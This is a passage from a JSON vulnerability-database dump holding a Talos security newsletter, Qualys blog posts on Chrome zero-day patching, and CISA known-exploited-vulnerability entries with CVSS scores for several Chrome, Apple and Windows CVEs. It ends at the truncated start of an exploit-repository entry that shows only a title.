be buying those credentials). At the time of its takedown, BreachForums had 340,000 members, according to the FBI. And reporting on Operation Cookie Monster stated that Genesis Market had 59,000 registered users.\n\nSo while it's great that these sites have been disrupted, I can't help but assume that two more sites are going to pop up to service these cyber criminals. 
It's impossible for any agency to arrest 340,000 people, so even if a handful of administrators are restricted from accessing the internet for a while, the other 339,000 people are going to be looking for a new home.\n\nSome of the same agencies celebrated in March 2021 that they [disrupted Emotet](<https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation>), one of the most infamous botnets ever. As anyone who follows security news will know, Emotet didn't actually go anywhere and was rebooted as recently as last month, [according to our research](<https://blog.talosintelligence.com/emotet-switches-to-onenote/>).\n\nRaidForums, a forefather of BreachForums, was [also disrupted in April 2022](<http://techtarget.com/searchsecurity/news/252515896/Law-enforcement-takedowns-continue-with-RaidForums-seizure>), along with the arrest of several administrators and accomplices.\n\nAll of this is not to discount the great strides made in the past few weeks in disrupting these marketplaces and taking them offline. But a lot of these headlines are sounding familiar to me after a few years, so it's important to remember that we as a security community can't take our foot off the gas and assume that, because there were a few big wins, [dark web forums are just going to go away forever](<https://talostakes.talosintelligence.com/2018149/11127920>).\n\n## The one big thing\n\n[Microsoft's Patch Tuesday](<https://blog.talosintelligence.com/microsoft-patch-tuesday-for-april-2023/>) for April included another zero-day vulnerability in the Windows Common Log File System Driver. [CVE-2023-28252](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-28252>), which could allow an attacker to obtain SYSTEM privileges, is actively being exploited in the wild, according to Microsoft. The U.S. 
Cybersecurity and Infrastructure Security Agency already added the vulnerability to its list of known exploited issues and urged federal agencies to patch it as soon as possible. Microsoft disclosed a similar zero-day issue in September that could also lead to the same privileges: CVE-2022-37969.\n\n### Why do I care?\n\nSecurity researchers say that the vulnerability has already been [exploited in Nokoyawa ransomware attacks](<https://www.bleepingcomputer.com/news/security/windows-zero-day-vulnerability-exploited-in-ransomware-attacks/>), so it's important to patch this issue as soon as possible. The Nokoyawa ransomware is known for targeting 64-bit Windows systems in double extortion attacks, in which the actors encrypt targets' files and then threaten to leak them unless the ransom is paid.\n\n### So now what?\n\nMicrosoft has a patch available, so all Windows users should update now if they haven't already. Talos also has [new Snort detection coverage available](<https://snort.org/advisories/talos-rules-2023-04-11>) for CVE-2023-28252 and other vulnerabilities disclosed as part of Patch Tuesday.\n\n## Top security headlines of the week\n\n**A trove of classified military documents and images leaked on several social media channels** over the past week, including potentially sensitive information on Russia's invasion of Ukraine and China's military plans. The images first surfaced in a Discord channel, eventually making their way onto the Telegram messaging app, the popular forum 4Chan and then broader social media sites like Twitter. The U.S. Department of Justice and the Pentagon have since launched a formal investigation into the leaks. Ukrainian officials have blamed Russian actors for the leaks, trying to cast doubt on the authenticity of the images, while Russia accused Western governments of trying to spread disinformation. 
([Bellingcat](<https://www.bellingcat.com/news/2023/04/09/from-discord-to-4chan-the-improbable-journey-of-a-us-defence-leak/>), [New York Times](<https://www.nytimes.com/2023/04/07/us/politics/classified-documents-leak.html>))\n\n**Apple released patches for two zero-day vulnerabilities** targeting current and older versions of iOS, iPadOS, macOS and Safari that attackers were exploiting in the wild. The vulnerabilities, CVE-2023-28206 and CVE-2023-28205, could lead to arbitrary code execution. CVE-2023-28206 specifically could allow an adversary to execute code with kernel privileges. Apple initially patched the issue in current iPhones and other devices and followed up a few days later with fixes for older hardware like the iPhone 8. This was the third instance of Apple patching a zero-day vulnerability since the start of the year. ([SC Media](<https://www.scmagazine.com/news/device-security/apple-patches-two-new-zero-days-targeting-iphones-ipads-macs>), [Security Week](<http://securityweek.com/apple-rolls-out-zero-day-patches-to-older-ios-macos-devices/>))\n\n**The FBI warned users again this week against plugging their phones in public charging stations** at common spaces like airports, hotels and shopping centers. The agency stated that threat actors have found ways to use the public USB ports to "introduce malware and monitoring software onto devices." Instead, the Federal Communications Commission suggests users carry their own USB cables and charging blocks to plug directly into outlets rather than relying on or trusting a cable. However, the tweet from the FBI's Denver office did not offer examples of any recent attacks that would have prompted a fresh warning. 
([Axios](<https://www.axios.com/2023/04/10/fbi-warning-charging-stations-juice-jacking>), [NBC News](<https://www.nbcnews.com/business/consumer/fbi-warns-using-public-phone-charging-stations-rcna78998>))\n\n## Can't get enough Talos?\n\n * [How threat actors are using AI and other modern tools to enhance their phishing attempts](<https://blog.talosintelligence.com/ai-and-other-modern-tools-enhance-phishing/>)\n * [How do you hunt cybersecurity threats in a war zone? Like this](<https://www.theregister.com/2023/04/07/talos_threat_hunting_ukraine/>)\n * [Cisco unveils latest security trends from Cisco Talos report at GISEC 2023](<https://www.intelligentcio.com/me/2023/03/14/cisco-unveils-latest-security-trends-from-cisco-talos-report-at-gisec-2023/>)\n * [Researcher Spotlight: Giannis Tziakouris first learned how to fix his family's PC, and now he's fixing networks all over the globe](<https://blog.talosintelligence.com/researcher-spotlight-giannis-tziakouris/>)\n\n## Upcoming events where you can find Talos\n\n**[RSA](<https://www.rsaconference.com/usa>) (April 24 - 27)**\n\nSan Francisco, CA\n\n**[Cisco Talos Incident Response: On Air](<https://www.linkedin.com/events/7049146334452355072/about/>) (April 27)**\n\nVirtual\n\n**[Cisco Live U.S.](<https://www.ciscolive.com/global.html?zid=pp>) (June 4 - 8)**\n\nLas Vegas, NV\n\n## Most prevalent malware files from Talos telemetry over the past week",
"cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-13T18:00:40", "type": "talosblog", "title": "Threat Source newsletter (April 13, 2023) \u2014 Dark web forum whac-a-mole", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-37969", "CVE-2023-28205", "CVE-2023-28206", "CVE-2023-28252"], "modified": "2023-04-13T18:00:40", "id": 
"TALOSBLOG:0590B57B0EE82F183D901AD4C42EB516", "href": "https://blog.talosintelligence.com/threat-source-newsletter-april-13-2023/", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2022-12-14T08:08:58", "description": "Google has released yet another security update for the Chrome desktop web browser to address a high-severity vulnerability that is being exploited in the wild. This is the ninth Chrome zero-day fixed this year by Google. This security bug ([CVE-2022-4262](<https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html>); _QID 377804_) is a Type Confusion vulnerability in Chrome\u2019s V8 JavaScript Engine.\n\nGoogle has withheld details about the vulnerability to prevent wider malicious exploitation and to allow users time to apply the necessary security updates to their Chrome installations.\n\nGoogle\u2019s previous zero-days were also released right before a weekend (see [Don\u2019t spend another weekend patching Chrome](<https://blog.qualys.com/product-tech/2022/10/28/chrome-zero-day-cve-2022-3723>) and [Don\u2019t Spend Your Holiday Season Patching Chrome](<https://blog.qualys.com/product-tech/patch-management/2022/11/29/dont-spend-your-holiday-season-patching-chrome>)).\n\n## Organizations respond, but slowly\n\nAnalyzing anonymized data from the Qualys data lake, the Qualys Threat Research Unit found that, for the Chrome zero-day vulnerabilities introduced between February and August, more than 90% of affected instances were remediated. However, it took 11-21 days to remediate via the Chrome patch. With the frequency of vulnerabilities released in this widely used browser and the fact that browsers, by their nature, are more exposed to external attacks, reducing the MTTR (mean time to remediate) for those Chrome vulnerabilities is critical.\n\n2022 Chrome Zero-Day Vulnerabilities, MTTR\n\nOf the nine Chrome zero-day threats this year, five were introduced just before the weekend on a Thursday or Friday. 
Organizations that don't leverage automated patching must spend the weekend or holiday working on the manual, lengthy process of detecting vulnerable devices, preparing the Chrome patch, testing it, and deploying it to affected assets.\n\nCVE| Release Date| Day of the Week| Vulnerability Remediation Rate \n---|---|---|--- \nCVE-2022-0609| 2/14/2022| Monday| 94% \nCVE-2022-1096| 3/25/2022| **Friday**| 94% \nCVE-2022-1364| 4/14/2022| **Thursday**| 93% \nCVE-2022-2294| 7/4/2022| Monday| 93% \nCVE-2022-2856| 8/16/2022| Tuesday| 91% \nCVE-2022-3075| 9/2/2022| **Friday**| 85% \nCVE-2022-3723| 10/27/2022| **Thursday**| 65% \nCVE-2022-4135| 11/24/2022| **Thursday (Thanksgiving)**| 52% \nCVE-2022-4262| 12/2/2022| **Friday**| NA \n\n2022 Chrome Zero-Day vulnerability release dates and percentage of remediation\n\n## Qualys Patch Management speeds remediation\n\nThe Qualys Threat Research Unit has found that, on average, critical vulnerabilities are weaponized in 15.9 days. Significantly reducing MTTR shortens the exposure window and improves an organization's risk posture.\n\n[Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) with Zero-Touch Patching allows organizations to use their Qualys Cloud Agent for vulnerability management and to deploy third-party application patches, including Chrome. If the Qualys Cloud Agent is installed on an asset, customers can patch it, regardless of any other deployed patch solution. By defining a simple zero-touch policy, assets can automatically deploy patches when the vendor releases a new one. If patches such as Chrome's need to be tested before production deployment, set up a zero-touch policy to deploy automatically to a set of test devices before deploying the same tested patches to production devices.\n\nIf you are a Qualys customer without Patch Management, a [trial](<https://www.qualys.com/apps/patch-management/>) can be enabled quickly, leveraging the same agent used with VMDR. 
This allows you to immediately deploy the Chrome patch to your environment and create those automation jobs to ensure that the next time Google or any other vendor releases a patch, your assets are automatically updated.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2022-12-03T05:24:27", "type": "qualysblog", "title": "The 9th Google Chrome Zero-Day Threat this Year \u2013 Again Just Before the Weekend", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075", "CVE-2022-3723", "CVE-2022-4135", "CVE-2022-4262"], "modified": "2022-12-03T05:24:27", "id": "QUALYSBLOG:058E013CF475F33D6DEBB8955340D15B", "href": "https://blog.qualys.com/category/product-tech/patch-management", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-02T20:29:49", "description": "As we head into the weekend, Google has released an emergency security update for the Chrome desktop web browser to address a high-severity vulnerability known to be exploited in the wild. 
This is the seventh Chrome zero-day fixed this year by Google. This security bug ([CVE-2022-3723](<https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html?m=1>); **_QID 377721_**) is a type-confusion flaw in the Chrome V8 JavaScript engine.\n\nGoogle has not shared details on the nature of the attacks in which this vulnerability is exploited, but said it is aware of reports that an exploit for this vulnerability exists in the wild.\n\nThe vulnerability is a \u201ctype confusion\u201d that affects the V8 component of Chrome. Type confusion typically arises when a piece of code does not verify the type of the object handed to it and uses that object blindly, as if it were of the expected type.\n\nType confusion can be extremely dangerous and can sometimes lead to code execution. By accessing memory regions that should not be reachable from the application's context, an attacker could read sensitive information belonging to other applications or cause crashes.\n\nAttacks on the V8 component of Chrome are not typical but are among the most dangerous. Google has not characterized the level of exploitation activity in the wild, so whether attacks using [CVE-2022-3723](<https://www.cve.org/CVERecord?id=CVE-2022-3723>) are widespread or limited is unknown at this time.\n\n## Zero Day and Third-Party Applications\n\nZero-day attacks in third-party business applications are a preferred and easy way for threat actors to find their way into your organization. As such, ensuring all end users\u2019 desktops and laptops are patched as soon as the zero-day fix is released is a critical task for every security and IT person.\n\nHowever, too many organizations struggle to remediate third-party application vulnerabilities expeditiously and oftentimes rely on the application\u2019s auto-update mechanism. 
Unfortunately, auto-update may or may not work in a timely manner, and enforcement and tracking are challenging.\n\n## Respond Faster with Zero Touch\n\nIt is highly recommended to treat desktop and laptop patching differently than server and production patching. In most cases, the risk of patching a desktop application and breaking core business functionality is lower than the risk of causing a severe impact in a production environment. As such, applying smart automation to the third-party applications on desktops and laptops allows organizations to respond faster to new zero-day threats with little IT intervention or extra work. In other words, once the policy is created, everything else is Zero Touch.\n\n## Using Qualys and Zero-Touch Patching to Reduce Risk\n\nAs part of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>), Zero-Touch Patching intelligently identifies the riskiest products in the environment and helps create automation jobs to automatically deploy the proper patches and configuration changes required for remediating vulnerabilities.\n\nBased on the Qualys patch prioritization report, applications are ranked by the number of vulnerabilities they introduce into the environment. Common feedback we hear from our customers is that browsers, including Chrome, are among the top five applications that introduce the largest number of vulnerabilities, and therefore the most risk. Following the recommendation of this report, it is easy for customers to create automated, zero-touch patch jobs that deploy patches to those top third-party applications. As Qualys supports patching these applications right out of the box, once those jobs are deployed, IT and security teams no longer need to spend time on remediation efforts every time a new patch is released. 
Aren't you tired of being a weekend remediation warrior?\n\n**_Qualys Patch Management > Prioritized Products > Windows > Chrome_**\n\nIf you are a Qualys customer who does not have Patch Management enabled, a [trial](<https://www.qualys.com/apps/patch-management/>) can be enabled quickly; it leverages the same VMDR agent, which allows you to immediately deploy the Chrome patch to your environment and then create those automation jobs to ensure that the next time Google or any other vendor releases a patch, your desktops and laptops are automatically updated.\n\n[Try Qualys Patch Management Today!](<https://www.qualys.com/apps/patch-management/>)\n\n## Contributors\n\n * Saeed Abbasi, Manager, Vulnerability Signatures, Qualys", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-28T22:07:37", "type": "qualysblog", "title": "Don\u2019t spend another weekend patching Chrome", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2022-10-28T22:07:37", "id": "QUALYSBLOG:2FF98A895C020ED1CE5E7F898BD6BA9A", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-28T20:49:22", "description": "As we head into the weekend, Google has released an emergency security update for the Chrome desktop web browser to address a high-severity vulnerability known to be exploited in the wild. This is the seventh Chrome zero-day fixed this year by Google. 
This security bug ([CVE-2022-3723](<https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html?m=1>); QID 377721) is a type-confusion flaw in the Chrome V8 JavaScript engine.\n\nGoogle has not shared details on the nature of the attacks in which this vulnerability is exploited, but said it is aware of reports that an exploit for this vulnerability exists in the wild.\n\nThe vulnerability is a \u201ctype confusion\u201d that affects the V8 component of Chrome. Type confusion typically arises when a piece of code does not verify the type of the object handed to it and uses that object blindly, as if it were of the expected type.\n\nType confusion can be extremely dangerous and can sometimes lead to code execution. By accessing memory regions that should not be reachable from the application's context, an attacker could read sensitive information belonging to other applications or cause crashes.\n\nAttacks on the V8 component of Chrome are not typical but are among the most dangerous. Google has not characterized the level of exploitation activity in the wild, so whether attacks using CVE-2022-3723 are widespread or limited is unknown at this time.\n\n## Zero Day and Third-Party Applications\n\nZero-day attacks in third-party business applications are a preferred and easy way for threat actors to find their way into your organization. As such, ensuring all end users\u2019 desktops and laptops are patched as soon as the zero-day fix is released is a critical task for every security and IT person.\n\nHowever, too many organizations struggle to remediate third-party application vulnerabilities expeditiously and oftentimes rely on the application\u2019s auto-update mechanism. Unfortunately, auto-update may or may not work in a timely manner, and enforcement and tracking are challenging.\n\n## Respond Faster with Zero Touch\n\nIt is highly recommended to treat desktop and laptop patching differently than server and production patching. 
In most cases, the risk of patching a desktop application and breaking core business functionality is lower than the risk of causing a severe impact in a production environment. As such, applying smart automation to the third-party applications on desktops and laptops allows organizations to respond faster to new zero-day threats with little IT intervention or extra work. In other words, once the policy is created, everything else is Zero Touch.\n\n## Using Qualys and Zero-Touch Patching to Reduce Risk\n\nAs part of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>), Zero-Touch Patching intelligently identifies the riskiest products in the environment and helps create automation jobs to automatically deploy the proper patches and configuration changes required for remediating vulnerabilities.\n\nBased on the Qualys patch prioritization report, applications are ranked by the number of vulnerabilities they introduce into the environment. Common feedback we hear from our customers is that browsers, including Chrome, are among the top five applications that introduce the largest number of vulnerabilities, and therefore the most risk. Following the recommendation of this report, it is easy for customers to create automated, zero-touch patch jobs that deploy patches to those top third-party applications. As Qualys supports patching these applications right out of the box, once those jobs are deployed, IT and security teams no longer need to spend time on remediation efforts every time a new patch is released. 
Aren't you tired of being a weekend remediation warrior?\n\nIf you are a Qualys customer who does not have Patch Management enabled, a [trial](<https://www.qualys.com/apps/patch-management/>) can be enabled quickly; it leverages the same VMDR agent, which allows you to immediately deploy the Chrome patch to your environment and then create those automation jobs to ensure that the next time Google or any other vendor releases a patch, your desktops and laptops are automatically updated.", "cvss3": {}, "published": "2022-10-28T19:40:19", "type": "qualysblog", "title": "Chrome Zero Day \u2013 Just Before the Weekend (again)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2022-10-28T19:40:19", "id": "QUALYSBLOG:E44F97839C7555E7A3CA4C08F8074CFD", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2023-11-08T19:39:20", "description": "Apple iOS, iPadOS, and macOS IOSurfaceAccelerator contain an out-of-bounds write vulnerability that allows an app to execute code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-04-10T00:00:00", "type": "cisa_kev", "title": "Apple iOS, iPadOS, and macOS IOSurfaceAccelerator Out-of-Bounds Write Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-04-10T00:00:00", "id": "CISA-KEV-CVE-2023-28206", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:39:20", "description": "Apple iOS, iPadOS, macOS, and Safari WebKit contain a use-after-free vulnerability that leads to code execution when processing maliciously crafted web content.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T00:00:00", "type": "cisa_kev", "title": "Apple Multiple Products WebKit Use-After-Free Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-10T00:00:00", "id": "CISA-KEV-CVE-2023-28205", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T19:39:43", "description": "Google Chromium V8 contains a type confusion vulnerability. Specific impacts from exploitation are not available at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-28T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2022-10-28T00:00:00", "id": "CISA-KEV-CVE-2022-3723", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-30T17:39:30", "description": "Google Chromium V8 contains a type confusion vulnerability. 
Specific impacts from exploitation are not available at this time.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-17T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-17T00:00:00", "id": "CISA-KEV-CVE-2023-2033", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T17:41:59", "description": "Google Chromium V8 engine contains a type confusion vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": 
"info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2022-04-15T00:00:00", "id": "CISA-KEV-CVE-2022-1364", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T19:39:43", "description": "Google Chromium V8 contains a type confusion vulnerability. Specific impacts from exploitation are not available at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-05T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2022-4262"], "modified": "2022-12-05T00:00:00", "id": "CISA-KEV-CVE-2022-4262", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T17:41:59", "description": "The vulnerability exists due to a type confusion error within the V8 component in Chromium, affecting all Chromium-based browsers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-28T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-03-28T00:00:00", "id": "CISA-KEV-CVE-2022-1096", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2023-11-09T00:31:01", "description": "# AcceleratorTroll\u2122 <img src=\"acceleratortroll/Assets.xcassets/A...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
